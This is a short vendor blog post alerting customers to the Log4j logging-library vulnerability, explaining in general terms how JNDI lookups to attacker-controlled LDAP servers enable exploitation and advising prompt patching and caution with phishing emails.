Log4j Alert: Biggest Software Vulnerability of all times!!!
It’s been observed attempted exploits of vulnerabilities in the Log4j logging library on more than 48% of corporate networks worldwide. 1.3 million hacking attempts have been reported so far!
What’s the Issue?
Log4j is an open-source logging library used by many developers to keep track of their online services or software applications.
On the 9th of December, a newly discovered computer bug in Log4j started rippling the cybersecurity community. Jen Easterly, U.S. Infrastructure and Cybersecurity Agency Director, said about the about vulnerability as;
“The log4j vulnerability is the most serious vulnerability I have seen in my decades-long career.”
Log4j allows logged messages to contain format strings that resource from external data through the JNDI. This makes the information to be retrieved remotely across multiple protocols, including LDAP.
As the content of logged messages usually contains user-controlled information or data, so attackers can insert Java Naming and Directory Interface (JNDI) references pointing to attackers-controlled LDAP servers. This will help the hackers get malicious Java classes to be served, thus extracting their desired action.
How to Prevent?
Cybersecurity experts are thriving hard to mitigate and eradicate the bug. In the meanwhile, security patches are being regularly released. End customers are encouraged to immediately switch to the latest versions of applications which are usually created after fixing the log4j issue.
Any phishing email— from any non-authoritative or unexpected resource in an untimely manner— shouldn’t be clicked or responded in any way. Any links or resource download in those phishing emails must be avoided.
We are ensuring a safe and seamless experience for our customers. In case of any complications, feel free to contact Claudion Team
Ethisham is a technical blogger and regular contributor for Claudion, ERPGulf and related publications.